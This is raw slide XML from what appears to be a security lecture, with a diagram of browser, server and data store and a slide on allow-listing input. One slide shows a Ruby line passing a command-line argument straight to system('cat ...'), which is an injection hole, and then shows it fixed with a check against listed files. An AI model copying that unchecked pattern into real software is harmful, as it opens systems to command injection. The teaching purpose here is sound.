                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="493">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93">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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93">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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B819-52A8-D383-D662-5EA5ABC6EA50}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 499">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{335EF4FE-4D43-7763-4902-F1CED1CBDEB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7580170" y="7589712"/>
            <a:ext cx="8534600" cy="78365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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  system("cat "+ARGV[0])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F2A8919-1335-1B88-8C95-8513CB7F58BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D906F93-8A97-FCA2-B1E9-063A9A73A207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F98D77-F4A5-2D38-4E06-0E927D0765D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7234600" y="2519541"/>
            <a:ext cx="9896939"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000" b="0" i="1" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Check that input known to be safe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107148455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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361297" y="4191502"/>
            <a:ext cx="4595438" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7111"/>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93" name="Shape 293"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625779" y="545293"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="572516">
              <a:defRPr sz="10976"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The Internet, in one slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="4336264"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="4336264"/>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Web/FTP/etc. server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15302403" y="8376367"/>
            <a:ext cx="3065575" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9840"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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rPr dirty="0"/>
              <a:t>Filesystem/Database/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud service/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="3247958"/>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298" name="Shape 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427265" y="4191502"/>
            <a:ext cx="4595438" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7111"/>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99" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="3247958"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16724983" y="7120355"/>
            <a:ext cx="1" cy="1150828"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419239" y="5675717"/>
            <a:ext cx="5545523" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319562" y="8376367"/>
            <a:ext cx="2678907" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9840"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Private)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7659015" y="7120355"/>
            <a:ext cx="1" cy="1150828"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9987298" y="7377789"/>
            <a:ext cx="4409405" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13322333" y="10623445"/>
            <a:ext cx="7025714" cy="1683152"/>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p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>FS/DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a separate entity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599704" y="10604546"/>
            <a:ext cx="6118623"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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Much) user data is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>part of the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Shape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14998864" y="7830055"/>
            <a:ext cx="3452241" cy="3067373"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5932895" y="7830055"/>
            <a:ext cx="3452242" cy="3067373"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798559" y="7832600"/>
            <a:ext cx="6786882" cy="2492395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>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a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Need to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>protect this state</a:t>
            </a:r>
            <a:r>
              <a:t> from illicit access and tampering</a:t>
            </a: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3" name="HTTP">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAD492A9-FA7B-DDEE-DE6C-33A3F44F812B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10681798" y="4859651"/>
            <a:ext cx="2672205" cy="913711"/>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rPr dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(S)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1447498892"/>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4"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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9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9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3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9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30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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="302"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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30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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="307"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="18" presetClass="entr" presetSubtype="12" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="308"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="308"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="23" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="309"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="309"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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advAuto="0"/>
      <p:bldP spid="295" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="296" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="300" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="301" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="302" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="303" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="304" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="304" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="305" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="306" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="307" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="308" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="309" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="3" grpId="0" animBg="1" advAuto="0"/>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F8D25-C2A4-038D-36F8-5B5A4F2DA4E4}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 502">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8456F6-1B56-635E-7625-F46E18AB18F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227885" y="3914470"/>
            <a:ext cx="20245926" cy="629980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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>files = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Dir.entries</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(".").reject {|f| </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>File.directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>?(f) }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> not (</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>files.member</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>? ARGV[0]) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  puts "illegal argument"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  exit 1</a:t>
            </a:r>
          </a:p>
